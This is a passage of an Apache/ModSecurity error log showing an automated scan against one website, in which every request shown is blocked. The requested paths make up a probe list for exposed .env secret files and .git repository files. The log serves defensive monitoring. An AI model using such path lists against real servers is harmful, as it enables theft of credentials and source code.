"OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/server/.env"] [unique_id "abzEw-WNdVzdR4d4e6ZM6gAAAQY"] [Fri Mar 20 05:53:39.476623 2026] [:error] [pid 17713:tid 17794] [client 104.23.239.55:13932] [client 104.23.239.55] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/srv/.env"] [unique_id "abzEw-WNdVzdR4d4e6ZM6wAAAQQ"] [Fri Mar 20 05:53:39.479516 2026] [:error] [pid 17713:tid 17807] [client 104.23.239.55:13931] [client 104.23.239.55] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/web/.env"] [unique_id "abzEw-WNdVzdR4d4e6ZM7AAAARE"] [Fri Mar 20 05:53:39.482361 2026] [:error] [pid 26363:tid 26418] [client 104.23.239.54:11502] [client 104.23.239.54] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/site/.env"] [unique_id "abzEw94YyF1e-QDujo_qVgAAAVU"] [Fri Mar 20 05:53:39.485365 2026] [:error] [pid 17713:tid 17809] [client 104.23.239.54:11501] [client 104.23.239.54] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/www/.env"] [unique_id "abzEw-WNdVzdR4d4e6ZM7QAAARM"] [Fri Mar 20 05:53:39.486594 2026] [:error] [pid 26363:tid 26404] [client 104.23.239.93:14163] [client 104.23.239.93] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/var/www/.env"] [unique_id "abzEw94YyF1e-QDujo_qVwAAAUc"] [Fri Mar 20 05:53:39.488132 2026] [:error] [pid 17713:tid 17791] [client 104.23.239.92:12546] [client 104.23.239.92] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/var/www/html/.env"] [unique_id "abzEw-WNdVzdR4d4e6ZM7gAAAQE"] [Fri Mar 20 05:53:39.490107 2026] [:error] [pid 17713:tid 17795] [client 104.23.239.55:13924] [client 104.23.239.55] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/home/.env"] [unique_id "abzEw-WNdVzdR4d4e6ZM7wAAAQU"] [Fri Mar 20 05:53:39.493256 2026] [:error] [pid 17713:tid 17803] [client 104.23.239.93:14161] [client 104.23.239.93] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/root/.env"] [unique_id "abzEw-WNdVzdR4d4e6ZM8AAAAQ0"] [Fri Mar 20 05:53:39.496392 2026] [:error] [pid 17713:tid 17800] [client 104.23.239.93:14168] [client 104.23.239.93] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env_config"] [unique_id "abzEw-WNdVzdR4d4e6ZM8QAAAQo"] [Fri Mar 20 05:53:39.497618 2026] [:error] [pid 17713:tid 17799] [client 104.23.239.92:12552] [client 104.23.239.92] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env_secret"] [unique_id "abzEw-WNdVzdR4d4e6ZM8gAAAQk"] [Fri Mar 20 05:53:39.499158 2026] [:error] [pid 17713:tid 17808] [client 104.23.239.55:13932] [client 104.23.239.55] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env_settings"] [unique_id "abzEw-WNdVzdR4d4e6ZM8wAAARI"] [Fri Mar 20 05:53:39.501130 2026] [:error] [pid 26363:tid 26416] [client 104.23.239.93:14163] [client 104.23.239.93] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env.local.backup"] [unique_id "abzEw94YyF1e-QDujo_qWAAAAVM"] [Fri Mar 20 05:53:39.515126 2026] [:error] [pid 14425:tid 14441] [client 104.23.239.93:12955] [client 104.23.239.93] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.git/HEAD"] [unique_id "abzEw0MqeKc_GzeuAXDWPgAAAM4"] [Fri Mar 20 05:53:39.519741 2026] [:error] [pid 17713:tid 17812] [client 104.23.239.54:9305] [client 104.23.239.54] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.git/index"] [unique_id "abzEw-WNdVzdR4d4e6ZM9AAAARY"] [Fri Mar 20 05:53:39.519823 2026] [:error] [pid 17713:tid 17805] [client 104.23.239.93:12963] [client 104.23.239.93] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.git/config"] [unique_id "abzEw-WNdVzdR4d4e6ZM9QAAAQ8"] [Fri Mar 20 05:53:39.522113 2026] [:error] [pid 14300:tid 14344] [client 104.23.239.55:9442] [client 104.23.239.55] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.git/logs/HEAD"] [unique_id "abzEw7R4r1NodKcenf6MbAAAAIM"] [Fri Mar 20 05:53:39.523320 2026] [:error] [pid 17713:tid 17813] [client 104.23.239.92:12656] [client 104.23.239.92] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.git/refs/heads/master"] [unique_id "abzEw-WNdVzdR4d4e6ZM9gAAARc"] [Fri Mar 20 05:53:39.525384 2026] [access_compat:error] [pid 26363:tid 26410] [client 104.23.239.54:11495] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/.env [Fri Mar 20 05:53:39.527601 2026] [:error] [pid 14425:tid 14451] [client 104.23.239.93:12955] [client 104.23.239.93] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.git/refs/heads/main"] [unique_id "abzEw0MqeKc_GzeuAXDWPwAAANg"] [Fri Mar 20 05:53:39.532337 2026] [:error] [pid 17713:tid 17793] [client 104.23.239.93:12963] [client 104.23.239.93] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env"] [unique_id "abzEw-WNdVzdR4d4e6ZM9wAAAQM"] [Fri Mar 20 05:53:39.534336 2026] [:error] [pid 17713:tid 17790] [client 104.23.239.92:12656] [client 104.23.239.92] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env.production"] [unique_id "abzEw-WNdVzdR4d4e6ZM-QAAAQA"] [Fri Mar 20 05:53:39.536371 2026] [:error] [pid 17713:tid 17806] [client 104.23.239.54:9305] [client 104.23.239.54] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env.development"] [unique_id "abzEw-WNdVzdR4d4e6ZM-gAAARA"] [Fri Mar 20 05:53:39.538686 2026] [:error] [pid 14300:tid 14373] [client 104.23.239.55:9442] [client 104.23.239.55] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env.dev"] [unique_id "abzEw7R4r1NodKcenf6MbQAAAJI"] [Fri Mar 20 05:53:39.540135 2026] [:error] [pid 14425:tid 14436] [client 104.23.239.93:12955] [client 104.23.239.93] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env.test"] [unique_id "abzEw0MqeKc_GzeuAXDWQAAAAMk"] [Fri Mar 20 05:53:39.542518 2026] [:error] [pid 26363:tid 26402] [client 104.23.239.92:12664] [client 104.23.239.92] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env.local"] [unique_id "abzEw94YyF1e-QDujo_qWQAAAUU"] [Fri Mar 20 05:53:39.546893 2026] [:error] [pid 17713:tid 17811] [client 104.23.239.93:12963] [client 104.23.239.93] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env.backup"] [unique_id "abzEw-WNdVzdR4d4e6ZM-wAAARU"] [Fri Mar 20 05:53:39.548758 2026] [:error] [pid 17713:tid 17804] [client 104.23.239.54:9305] [client 104.23.239.54] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env.bak"] [unique_id "abzEw-WNdVzdR4d4e6ZM_AAAAQ4"] [Fri Mar 20 05:53:39.551369 2026] [:error] [pid 14300:tid 14341] [client 104.23.239.55:9442] [client 104.23.239.55] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env.old"] [unique_id "abzEw7R4r1NodKcenf6MbgAAAIE"] [Fri Mar 20 05:53:39.554760 2026] [:error] [pid 17713:tid 17797] [client 104.23.239.92:12656] [client 104.23.239.92] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env.tmp"] [unique_id "abzEw-WNdVzdR4d4e6ZM_QAAAQc"] [Fri Mar 20 05:53:39.555414 2026] [:error] [pid 17713:tid 17810] [client 104.23.239.54:9307] [client 104.23.239.54] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env.staging"] [unique_id "abzEw-WNdVzdR4d4e6ZM_gAAARQ"] [Fri Mar 20 05:53:39.561529 2026] [:error] [pid 17713:tid 17798] [client 104.23.239.54:9305] [client 104.23.239.54] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env.production.local"] [unique_id "abzEw-WNdVzdR4d4e6ZM_wAAAQg"] [Fri Mar 20 05:53:39.563122 2026] [:error] [pid 17713:tid 17814] [client 104.23.239.55:9449] [client 104.23.239.55] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env.save"] [unique_id "abzEw-WNdVzdR4d4e6ZNAAAAARg"] [Fri Mar 20 05:53:39.563720 2026] [:error] [pid 14300:tid 14369] [client 104.23.239.55:9442] [client 104.23.239.55] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env.development.local"] [unique_id "abzEw7R4r1NodKcenf6MbwAAAJA"] [Fri Mar 20 05:53:39.568292 2026] [:error] [pid 17713:tid 17792] [client 104.23.239.54:9307] [client 104.23.239.54] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/config/.env"] [unique_id "abzEw-WNdVzdR4d4e6ZNAQAAAQI"] [Fri Mar 20 05:53:39.569734 2026] [:error] [pid 26363:tid 26414] [client 104.23.239.54:9309] [client 104.23.239.54] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env.example"] [unique_id "abzEw94YyF1e-QDujo_qWgAAAVE"] [Fri Mar 20 05:53:39.573915 2026] [:error] [pid 17713:tid 17802] [client 104.23.239.54:9305] [client 104.23.239.54] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/backend/.env"] [unique_id "abzEw-WNdVzdR4d4e6ZNAgAAAQw"] [Fri Mar 20 05:53:39.575653 2026] [:error] [pid 14425:tid 14446] [client 104.23.239.93:12955] [client 104.23.239.93] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/api/.env"] [unique_id "abzEw0MqeKc_GzeuAXDWQgAAANM"] [Fri Mar 20 05:53:39.576388 2026] [:error] [pid 26363:tid 26405] [client 104.23.239.92:12664] [client 104.23.239.92] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/admin/.env"] [unique_id "abzEw94YyF1e-QDujo_qWwAAAUg"] [Fri Mar 20 05:53:39.578217 2026] [:error] [pid 26363:tid 26398] [client 104.23.239.55:9456] [client 104.23.239.55] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/app/.env"] [unique_id "abzEw94YyF1e-QDujo_qXAAAAUE"] [Fri Mar 20 05:53:39.581905 2026] [access_compat:error] [pid 17713:tid 17796] [client 104.23.239.55:9449] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/.env [Fri Mar 20 05:53:39.582191 2026] [:error] [pid 17713:tid 17794] [client 104.23.239.93:12963] [client 104.23.239.93] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/public/.env"] [unique_id "abzEw-WNdVzdR4d4e6ZNBAAAAQQ"] [Fri Mar 20 05:53:39.586152 2026] [:error] [pid 17713:tid 17807] [client 104.23.239.92:12656] [client 104.23.239.92] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/private/.env"] [unique_id "abzEw-WNdVzdR4d4e6ZNBQAAARE"] [Fri Mar 20 05:53:39.588257 2026] [:error] [pid 